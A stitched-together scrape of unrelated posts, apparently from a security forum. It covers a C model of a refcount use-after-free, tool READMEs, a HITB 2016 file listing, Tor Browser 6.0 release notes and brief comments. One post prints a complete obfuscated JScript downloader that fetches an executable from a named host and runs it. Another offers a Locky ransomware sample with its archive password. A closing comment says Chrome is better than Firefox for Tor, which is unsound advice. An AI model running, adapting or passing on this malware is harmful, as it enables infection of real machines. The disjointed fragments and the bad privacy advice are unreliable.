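 * again on error, so with FDPUT_FPUT set the refcount is over-decremented. */
int caller_buggy(struct file *target, int table_shared)
{
	struct fd f = fdget(target, table_shared);
	long err = bpf_map_get(f);
	if (err) { fdput(f); return (int)err; }  /* second put on the error path */
	fdput(f);
	return 0;
}

/* Caller honouring the callee's contract: on error the fd is already
 * released, so exactly one put happens on every path. */
int caller_fixed(struct file *target, int table_shared)
{
	struct fd f = fdget(target, table_shared);
	long err = bpf_map_get(f);
	if (err) return (int)err;
	fdput(f);
	return 0;
}

/* Runs a caller against a constructed non-map file held once by the fd table
 * and returns the refcount left: 1 is balanced, 0 means the file would be
 * freed while the table still references it (the use-after-free). */
int refcount_after(int (*caller)(struct file *, int), int table_shared)
{
	struct file sock = { 1, 0 };
	caller(&sock, table_shared);
	return sock.refcount;
}
```

With a private fd table the buggy caller is harmless (no reference was taken, so no put is owed), which is why the post ties the bug to a shared file descriptor table.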
  16. Android-Security-Reference

This is a reference guide for all things Android Security. I'm slowly moving my private notes over to this repo as:
- It may help others
- Others may help me (by correcting / adding to the ref)

Feel free to contribute!

Tools
- Nav helper: OctoTree
- TOC gen: DocToc

Source: https://github.com/doridori/Android-Security-Reference
  17. Anti-Sandbox and Anti-Virtual Machine Tool

(Turkish: https://github.com/AlicanAkyol/sems/blob/master/Readme_Turkish.md)
(Sha1 (sems.exe): 06598E9948C2E256C871E66B5578D51A1886758F)

Modern malware is equipped with anti-analysis techniques in order to evade analysis. It is common for malware to check for the presence of any virtualization environment, any malware analysis sandbox or any analysis tools during runtime. sems is a tool which was created to help malware researchers by checking their environments for the signatures of any virtualization techniques, malware sandbox tools or well-known malware analysis tools. sems uses the same techniques and looks for the same footprints that evasive malware does in order to detect if it is running in a controlled environment. So it is useful for malware researchers to check if the analysis environment is inevasible.

How it works

Virtual Machine
Once the tool is run in a virtual machine (VirtualBox, VMware, QEMU), it performs all the checks which are shown below and drops logs to the console about detected signatures until the "control" text is shown. In addition to that, a separate .txt file with the finding name is created in the running directory for each detected signature. Example: vboxBios.txt will be created for the VirtualBox BIOS signature.

Malware Sandbox
The sems tool is sent to a malware sandbox like any other malware sample and waits until the completion of analysis. Detected signatures can be seen in the "File Operations" section of the sandbox report, since sems drops a separate .txt file for each finding.

Source: https://github.com/AlicanAkyol/sems
  18. Link: https://conference.hitb.org/hitbsecconf2016ams/materials/

Name | Last modified | Size
CLOSING KEYNOTE - Sophia D Antoine - Hardware Side Channels in Virtualized Environments.pdf | 2016-05-27 18:40 | 2.3M
D1 COMMSEC - Elisabeth de Leeuw - Unformation in the Era of Hyper Connectivity.pdf | 2016-05-26 18:03 | 2.5M
D1 COMMSEC - Marc Newlin - Applying Regulatory Data to IoT RF Reverse Engineering.pdf | 2016-05-26 15:59 | 5.7M
D1 COMMSEC - Martin Knobloch - Don't Feed the Hippos.pdf | 2016-05-26 16:00 | 18M
D1 COMMSEC - Melanie Rieback - Pentesting ChatOps.pdf | 2016-05-30 10:06 | 3.4M
D1 COMMSEC - Nadav Markus and Gal De Leon - Exploiting GLIBC - Hacking Everything.pdf | 2016-05-26 18:18 | 1.0M
D1T1 - Jacob Torrey - Using the Observer Effect and Cyber Fengshui.pdf | 2016-05-26 15:37 | 4.9M
D1T1 - Lin Huang - Forcing a Targeted LTE Cellphone into an Eavesdropping Network.pdf | 2016-05-26 18:00 | 1.7M
D1T1 - Nick Biasini - Exploit Kits - Hunting the Hunters .pdf | 2016-05-26 17:05 | 45M
D1T1 - Radu Caragea - Peering into the Depths of TLS Traffic in Real Time.pdf | 2016-05-26 15:09 | 1.1M
D1T1 - Shengping Wang and Xu Liu - Escape From The Docker-KVM-QEMU Machine.pdf | 2016-05-26 12:16 | 2.0M
D1T1 - Tang Qing Hao - Virtualization System Vulnerability Discovery Framework.pdf | 2016-05-26 11:50 | 1.0M
D1T2 - Broderick Aquilino and Wayne Low - Kernel Exploit Hunting and Mitigation.pdf | 2016-05-26 15:10 | 1.4M
D1T2 - Chilik Tamir - Profiting from iOS Malware.pdf | 2016-05-26 15:37 | 27M
D1T2 - Michele Spagnuolo and Lukas Weichselbaum - CSP Oddities.pdf | 2016-05-26 12:31 | 1.6M
D1T2 - Seunghun Han - Create Your Own Bad USB Device.pdf | 2016-05-26 17:00 | 3.5M
D1T2 - Tim Xia - Adaptive Android Kernel Live Patching.pdf | 2016-05-26 18:20 | 2.4M
D1T2 - Yann Allain and Julien Moinard - Hardsploit Project.pdf | 2016-05-26 11:50 | 8.5M
D1T3 - Gustavo Grieco - Vulnerability Discovery Using Machine Learning.pdf | 2016-05-27 07:18 | 1.1M
D1T3 LABS - Anto Joseph - Droid-FF.pdf | 2016-05-26 12:31 | 30M
D1T3 LABS - Tony Trummer and Tushar Dalvi - Mobile Application Security for iOS and Android.zip | 2016-05-26 18:29 | 4.9M
D2 COMMSEC - Antonio Martins - Inspecage - Android Pacakge Inspector.zip | 2016-05-30 18:30 | 19M
D2 COMMSEC - Barry van Kampen - Hack in The Class.pdf | 2016-05-30 18:28 | 520K
D2 COMMSEC - Mattijs van Ommeren - A Series Of Unfortunate Events - Where Malware Meets Murphy.pdf | 2016-05-27 12:24 | 71M
D2 COMMSEC - Paul Marinescu - Facebook Presents Capture the Flag.pdf | 2016-05-30 10:17 | 6.3M
D2T1 - Anders Fogh - Cache Side Channel Attacks.pdf | 2016-05-27 13:52 | 432K
D2T1 - Felix Wilhelm - Attacking Next Generation Firewalls.pdf | 2016-05-27 15:59 | 2.9M
D2T1 - Jun Li - CANSsee - An Automobile Intrusion Detection System.pdf | 2016-05-27 18:39 | 5.5M
D2T1 - Yuwei Zheng and Haoqi Shan - Forging a Wireless Time Signal to Attack NTP Servers.pdf | 2016-05-27 12:26 | 6.9M
D2T1 Itzik Kotler and Amit Klein - The Perfect Exfiltration Technique.pdf | 2016-05-27 15:07 | 2.6M
D2T2 - Mikhail Egorov and Sergey Soldatov - New Methods for Exploiting ORM Injections in Java Applications.pdf | 2016-05-27 12:46 | 1.7M
D2T2 - Peter blasty Geissler - Breaking Naive ESSID WPA2 Key Generation Algorithms.pdf | 2016-05-27 18:39 | 8.4M
D2T2 - Richard Johnson - Go Speed Tracer - Guided Fuzzing.pdf | 2016-05-27 12:39 | 4.4M
D2T2 - Shangcong Luan - Xen Hypervisor VM Escape.pdf | 2016-05-27 15:37 | 1.9M
D2T2 - Wish Wu - Perf - From Profiling to Kernel Exploiting.pdf | 2016-05-27 15:06 | 315K
D2T3 LABS - Matteo Beccaro - Electronic Access Control Security.pdf | 2016-05-27 16:11 | 13M
KEYNOTE 1 - John Adams - Beyond FBI v Apple.pdf | 2016-05-26 09:40 | 6.4M
KEYNOTE 2 - Adam Laurie - The Future Has Arrived and it's Effin Hilarious.odp | 2016-05-27 10:47 | 281M
Whitepapers/ | 2016-05-27 18:40 | -

Congratulations Radu Caragea @ Bitdefender - https://conference.hitb.org/hitbsecconf2016ams/materials/D1T1 - Radu Caragea - Peering into the Depths of TLS Traffic in Real Time.pdf
  19. Tor Browser 6.0 is released

Posted May 30th, 2016 by gk

The Tor Browser Team is proud to announce the first stable release in the 6.0 series. This release is available from the Tor Browser Project page and also from our distribution directory.

This release brings us up to date with Firefox 45-ESR, which should mean a better support for HTML5 video on Youtube, as well as a host of other improvements.

Beginning with the 6.0 series code-signing for OS X systems is introduced. This should help our users who had trouble with getting Tor Browser to work on their Mac due to Gatekeeper interference. There were bundle layout changes necessary to adhere to code signing requirements but the transition to the new Tor Browser layout on disk should go smoothly.

The release also features new privacy enhancements and disables features where we either did not have the time to write a proper fix or where we decided they are rather potentially harmful in a Tor Browser context.

On the security side this release makes sure that SHA1 certificate support is disabled and our updater is not only relying on the signature alone but is checking the hash of the downloaded update file as well before applying it. Moreover, we provide a fix for a Windows installer related DLL hijacking vulnerability.

A note on our search engine situation: Lately, we got a couple of comments on our blog and via email wondering why we are now using DuckDuckGo as the default search engine and not Disconnect anymore. Well, we still use Disconnect. But for a while now Disconnect has no access to Google search results anymore which we used in Tor Browser. Disconnect being more a meta search engine which allows users to choose between different search providers fell back to delivering Bing search results which were basically unacceptable quality-wise. While Disconnect is still trying to fix the situation we asked them to change the fallback to DuckDuckGo as their search results are strictly better than the ones Bing delivers.

The full changelog since Tor Browser 5.5.5 is:

Tor Browser 6.0 -- May 30

All Platforms
- Update Firefox to 45.1.1esr
- Update OpenSSL to 1.0.1t
- Update Torbutton to 1.9.5.4
  - Bug 18466: Make Torbutton compatible with Firefox ESR 45
  - Bug 18743: Pref to hide 'Sign in to Sync' button in hamburger menu
  - Bug 18905: Hide unusable items from help menu
  - Bug 16017: Allow users to more easily set a non-tor SSH proxy
  - Bug 17599: Provide shortcuts for New Identity and New Circuit
  - Translation updates
  - Code clean-up
- Update Tor Launcher to 0.2.9.3
  - Bug 13252: Do not store data in the application bundle
  - Bug 18947: Tor Browser is not starting on OS X if put into /Applications
  - Bug 11773: Setup wizard UI flow improvements
  - Translation updates
- Update HTTPS-Everywhere to 5.1.9
- Update meek to 0.22 (tag 0.22-18371-3)
  - Bug 18371: Symlinks are incompatible with Gatekeeper signing
  - Bug 18904: Mac OS: meek-http-helper profile not updated
- Bug 15197 and child tickets: Rebase Tor Browser patches to ESR 45
- Bug 18900: Fix broken updater on Linux
- Bug 19121: The update.xml hash should get checked during update
- Bug 18042: Disable SHA1 certificate support
- Bug 18821: Disable libmdns support for desktop and mobile
- Bug 18848: Disable additional welcome URL shown on first start
- Bug 14970: Exempt our extensions from signing requirement
- Bug 16328: Disable MediaDevices.enumerateDevices
- Bug 16673: Disable HTTP Alternative-Services
- Bug 17167: Disable Mozilla's tracking protection
- Bug 18603: Disable performance-based WebGL fingerprinting option
- Bug 18738: Disable Selfsupport and Unified Telemetry
- Bug 18799: Disable Network Tickler
- Bug 18800: Remove DNS lookup in lockfile code
- Bug 18801: Disable dom.push preferences
- Bug 18802: Remove the JS-based Flash VM (Shumway)
- Bug 18863: Disable MozTCPSocket explicitly
- Bug 15640: Place Canvas MediaStream behind site permission
- Bug 16326: Verify cache isolation for Request and Fetch APIs
- Bug 18741: Fix OCSP and favicon isolation for ESR 45
- Bug 16998: Disable <link rel="preconnect"> for now
- Bug 18898: Exempt the meek extension from the signing requirement as well
- Bug 18899: Don't copy Torbutton, TorLauncher, etc. into meek profile
- Bug 18890: Test importScripts() for cache and network isolation
- Bug 18886: Hide pocket menu items when Pocket is disabled
- Bug 18703: Fix circuit isolation issues on Page Info dialog
- Bug 19115: Tor Browser should not fall back to Bing as its search engine
- Bug 18915+19065: Use our search plugins in localized builds
- Bug 19176: Zip our language packs deterministically
- Bug 18811: Fix first-party isolation for blobs URLs in Workers
- Bug 18950: Disable or audit Reader View
- Bug 18886: Remove Pocket
- Bug 18619: Tor Browser reports "InvalidStateError" in browser console
- Bug 18945: Disable monitoring the connected state of Tor Browser users
- Bug 18855: Don't show error after add-on directory clean-up
- Bug 18885: Disable the option of logging TLS/SSL key material
- Bug 18770: SVGs should not show up on Page Info dialog when disabled
- Bug 18958: Spoof screen.orientation values
- Bug 19047: Disable Heartbeat prompts
- Bug 18914: Use English-only label in <isindex/> tags
- Bug 18996: Investigate server logging in esr45-based Tor Browser
- Bug 17790: Add unit tests for keyboard fingerprinting defenses
- Bug 18995: Regression test to ensure CacheStorage is disabled
- Bug 18912: Add automated tests for updater cert pinning
- Bug 16728: Add test cases for favicon isolation
- Bug 18976: Remove some FTE bridges

Windows
- Bug 13419: Support ICU in Windows builds
- Bug 16874: Fix broken https://sports.yahoo.com/dailyfantasy page
- Bug 18767: Context menu is broken on Windows in ESR 45 based Tor Browser

OS X
- Bug 6540: Support OS X Gatekeeper
- Bug 13252: Tor Browser should not store data in the application bundle
- Bug 18951: HTTPS-E is missing after update
- Bug 18904: meek-http-helper profile not updated
- Bug 18928: Upgrade is not smooth (requires another restart)

Build System

All Platforms
- Bug 18127: Add LXC support for building with Debian guest VMs
- Bug 16224: Don't use BUILD_HOSTNAME anymore in Firefox builds
- Bug 18919: Remove unused keys and unused dependencies

Windows
- Bug 17895: Use NSIS 2.51 for installer to avoid DLL hijacking
- Bug 18290: Bump mingw-w64 commit we use

OS X
- Bug 18331: Update toolchain for Firefox 45 ESR
- Bug 18690: Switch to Debian Wheezy guest VMs

Linux
- Bug 18699: Stripping fails due to obsolete Browser/components directory
- Bug 18698: Include libgconf2-dev for our Linux builds
- Bug 15578: Switch to Debian Wheezy guest VMs (10.04 LTS is EOL)

Source: https://blog.torproject.org/blog/tor-browser-60-released
  20. It depends on experience. It's the same as in programming.
  21. Pentesting with one hand on the mouse and the other in your pants.
  22. Hi,

I received another email with a JS inside a ZIP. It's stupid: it starts with comments, has the code somewhere in the middle and ends with comments. Anyway, the JS is the following:

var WARRANTIES0 = false; var mousemove0 = ""; var code; var delts = "C" + "r"+"e"+"ateObject"; /*@cc_on /* QU5zoJYpASu6 */ @if (@_win32 || @_win64)/* QU5zoJYpASu6 */ // WARRANTIES0 /* QU5zoJYpASu6 */= true;/* QU5zoJYpASu6 */ mousemove0/* QU5zoJYpASu6 */ = /* QU5zoJYpASu6 */"MLH";/* QU5zoJYpASu6 */ code =/* QU5zoJYpASu6 */ "R" + "esponseB"/* QU5zoJYpASu6 */ + "ydo".split('').reverse().join(''); objref = /* QU5zoJYpASu6 */(/* QU5zoJYpASu6 */"noitisop").split(''/* QU5zoJYpASu6 */).reverse(/* QU5zoJYpASu6 */).join(''); directionally0/* QU5zoJYpASu6 */ =/* QU5zoJYpASu6 */ "eliFoTevaS".split(''/* QU5zoJYpASu6 */).reverse().join(''); B12F40 = "A"+"DODB"; mousemove1 = "s" + "end"; dishy = "ht"+"tp:"+"//s"+"cr"+"ubs"+".dr"+"es"+"sco"+"ol."+"co"+"/z"+"cv"+"3h"+"hs"; dishy0 /* QU5zoJYpASu6 */ = "G\x45"+"T"; /* QU5zoJYpASu6 */ @end/* QU5zoJYpASu6 */ @*//* QU5zoJYpASu6 */ if (!(WARRANTIES0)) { WScript.Echo("pizzzzda"); WScript.Quit(1); } var Summary/* QU5zoJYpASu6 */ = /* QU5zoJYpASu6 */this[/* QU5zoJYpASu6 */"WScript"/* QU5zoJYpASu6 */]/* QU5zoJYpASu6 */; var delts0 = function mousemove() {return Summary[delts](("Trafdscks", "WScript")+".Shell");}(), delay0 = 4 * 2 + 3; var Amount0 = 1 * (2 - 0); var countRemain = Amount0 - ((1 * 2) + 0) * 1; function directionally(Summary0){delts0[("Ifasd ", "Gef.H.", "R")+ "u" + ("fudfk", "n")](Summary0, countRemain, countRemain);}; function cir(){return delts;}; { var code0 = "M" + "SX"+"ML2."+"X"+mousemove0+"T"+"TP"; var delay = ""; delay = "o"+"pen"; function penetration(FFFFF00) {FFFFF00[directionally0](delts0["E"+"xpandEnvir"+"o"+"nmentStrings"]("%T"+"E"+"M"+"P%/") + "qSj87b4UV.ex" + "e", (-9815 + 9817) * 1); return 0;}; if (true){ penetration1 = code0; cos1 = Summary[delts](penetration1); var WARRANTIES = 3-2; do { for (;WARRANTIES;){ try { if (WARRANTIES == 1) { cos1[delay](dishy0 /* QU5zoJYpASu6 */, dishy, (true, false)); cos1[mousemove1](); cos0 = "S"+"l"+"eep"; WARRANTIES = 2; } Summary[cos0](120); if (cos1["r"+"eadystate"] < 2 * 2) continue; WARRANTIES = countRemain; function cos(B12F4) {var penetration0 = (123, B12F4); return penetration0;}; FFFFF0 = delts0["E"+"xpandEnvir"+"o"+"nmentStrings"]("%T"+"E"+"M"+"P%/") + "qSj87b4UV.ex" + "e"; countRemain0 = delts0["E"+"xpandEnvir"+"o"+"nmentStrings"]("%T"+"E"+"M"+"P%/") + "suc11.05.2016kit.bat"; objref0 = "start "+FFFFF0+"\r\nexit" penetration1 = directionally1 = Summary[cir()](B12F40+"."+"Str"+"e"+"a"+"m"); penetration1[delay](); penetration1["t"+"y"+"pe"] = 2; Amount /* QU5zoJYpASu6 */ = "w"+"r"+"i"+"t"+"e"; penetration1["Charset"] = "windows-1251"; penetration1[Amount+"Text"](objref0); directionally1[objref] = 1 * 0; penetration1[directionally0](countRemain0, 2 * 1); directionally1["c"+"l"+"o"+"s"+"e"](); penetration1 = directionally1 = Summary[cir()](B12F40+"."+"Str"+"e"+"a"+"m"); penetration1[delay](); penetration1["t"+"y"+"pe"] = 2; penetration1["Charset"] = "windows-1251"; penetration1[Amount+"Text"]("M"); directionally1[objref] = 0; penetration(penetration1); directionally1["c"+"l"+"o"+"s"+"e"](); penetration1 = directionally1 = Summary[cir()](B12F40+"."+"Str"+"e"+"a"+"m"); penetration1[delay](); penetration1["t"+"y"+"pe"] = 1 * 1; penetration1[Amount](cos1[code]); directionally1[objref] = 1; penetration(penetration1); directionally1["c"+"l"+"o"+"s"+"e"](); if (1 && WARRANTIES0) directionally(countRemain0); } catch(cir0){};}; }while (WARRANTIES); } }

It's "obfuscated" half-assed:

dishy = "ht"+"tp:"+"//s"+"cr"+"ubs"+".dr"+"es"+"sco"+"ol."+"co"+"/z"+"cv"+"3h"+"hs";

I wonder what nationality the author might be:

if (!(WARRANTIES0)) { WScript.Echo("pizzzzda"); WScript.Quit(1); }

Come on guys, you can do better!
  23. Attention! This is ransomware/malware/virus! Do NOT download!

Hi,

Today I received an email with a macro-enabled Word file (.docm). I haven't had time to look over it, but it seems to be Locky Ransomware. I scanned it on VirusTotal: https://virustotal.com/en/file/316d5366c4720c8be340088836d200866cea471ce01375314b48c36fbf593c70/analysis/1463064016/

The obfuscated macros can be seen there.

Archive password: infected_rst

For those who don't know what this is about, it would be better NOT to download it.

MalwareSample.zip
  24. Avoid going off-topic. It is an open redirect after all. I reported it to the IPB people, waiting for a reply.
  25. So: use Chrome with Tor, not that shitty Firefox.